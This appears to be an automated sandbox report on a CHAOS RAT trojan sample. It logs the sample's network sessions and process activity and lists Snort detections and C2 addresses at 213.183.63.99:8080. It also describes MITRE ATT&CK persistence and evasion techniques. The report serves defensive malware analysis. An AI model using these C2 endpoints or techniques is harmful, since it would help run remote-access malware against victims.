Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49765	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:45 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:46 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 63 66 30 38 64 34 36 66 61 34 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:46 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c941cf08d46fa4-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:46 UTC	216	IN	Data Raw: 64 32 0d 0a 66 6c 3d 34 31 33 66 37 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 32 36 2e 30 38 33 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d2fl=413f7h=cloudflare.comip=89.149.18.60ts=1701076426.083visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49766	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:49 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:50 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 35 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 31 65 37 63 65 37 30 35 39 66 32 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:50 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c941e7ce7059f2-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:50 UTC	222	IN	Data Raw: 64 38 0d 0a 66 6c 3d 33 35 30 66 36 36 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 33 30 2e 30 34 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 30 31 30 2d 69 61 64 30 33 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d8fl=350f66h=cloudflare.comip=89.149.18.60ts=1701076430.048visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=010-iad03http=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49767	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:54 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:54 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 35 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 32 30 36 30 38 66 33 33 39 31 66 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:54 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c9420608f3391f-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:54 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 36 32 36 66 35 33 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 33 34 2e 38 38 39 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=626f53h=cloudflare.comip=89.149.18.60ts=1701076434.889visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49768	104.16.133.229	443	6684	C:\Users\user\Desktop\pointcross.dat.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-27 09:13:58 UTC	108	OUT	GET /cdn-cgi/trace HTTP/1.1 Host: cloudflare.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2023-11-27 09:13:58 UTC	332	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 39 3a 31 33 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 32 63 39 34 32 31 65 64 39 61 66 32 30 37 65 2d 49 41 44 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 44 45 4e 59 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 09:13:58 GMTContent-Type: text/plainTransfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *Server: cloudflareCF-RAY: 82c9421ed9af207e-IADX-Frame-Options: DENYX-Content-Type-Options:
2023-11-27 09:13:58 UTC	217	IN	Data Raw: 64 33 0d 0a 66 6c 3d 36 30 31 66 38 35 0a 68 3d 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 39 2e 31 34 39 2e 31 38 2e 36 30 0a 74 73 3d 31 37 30 31 30 37 36 34 33 38 2e 38 35 34 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 0a 63 6f 6c 6f 3d 49 41 44 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74 65 77 61 79 3d 6f 66 66 0a 72 62 69 3d 6f 66 66 0a 6b 65 78 3d 58 32 35 35 31 39 0a 0d 0a Data Ascii: d3fl=601f85h=cloudflare.comip=89.149.18.60ts=1701076438.854visit_scheme=httpsuag=Go-http-client/1.1colo=IADsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgateway=offrbi=offkex=X25519
2023-11-27 09:13:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:11:53
Start date:	27/11/2023
Path:	C:\Users\user\Desktop\pointcross.dat.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\pointcross.dat.exe
Imagebase:	0x8f0000
File size:	5'921'280 bytes
MD5 hash:	585381BC89179FE4FD758C05AE7049B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_CHAOSRAT, Description: Yara detected CHAOS RAT, Source: 00000000.00000002.2873194373.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	10:11:53
Start date:	27/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	10:11:53
Start date:	27/11/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "schtasks /query /tn Orchestrator Cache Storage /v /fo LIST"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:11:55
Start date:	27/11/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\schtasks.exe" /query /tn Orchestrator Cache Storage /v /fo LIST
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: Traffic	Snort IDS: 2046873 ET TROJAN CHAOS RAT CnC Server Status Check 192.168.2.4:49732 -> 213.183.63.99:8080
Source: Traffic	Snort IDS: 2046872 ET TROJAN CHAOS RAT Client Checkin 192.168.2.4:49731 -> 213.183.63.99:8080
Source: Traffic	Snort IDS: 2037145 ET TROJAN Win32/Khaosz.A!MTB Checkin 192.168.2.4:49732 -> 213.183.63.99:8080

Source: Joe Sandbox View	IP Address: 104.16.133.229 104.16.133.229
Source: Joe Sandbox View	IP Address: 104.16.133.229 104.16.133.229

Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000106000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000096000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/device
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/deviceMon
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000268000.00000004.00001000.00020000.00000000.sdmp, pointcross.dat.exe, 00000000.00000002.2873977324.000000C0003E4000.00000004.00001000.00020000.00000000.sdmp, pointcross.dat.exe, 00000000.00000002.2873977324.000000C00036E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/health
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthLoopback
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C0003E4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthMon
Source: pointcross.dat.exe, 00000000.00000002.2876349228.000000C00041C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/devicehttp://213.183.63.99:8080/healthhttp://213.183.63.99:8080/healthLoop
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000106000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/health
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C00031E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/healthLoopback
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000096000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/healthMon
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/healtha
Source: pointcross.dat.exe, 00000000.00000002.2873977324.000000C000106000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://213.183.63.99:8080/s0
Source: pointcross.dat.exe, 00000000.00000002.2873194373.00000000008F1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://cloudflare.com/cdn-cgi/tracestrings.Builder.Grow:

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99
Source: unknown	TCP traffic detected without corresponding DNS query: 213.183.63.99

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

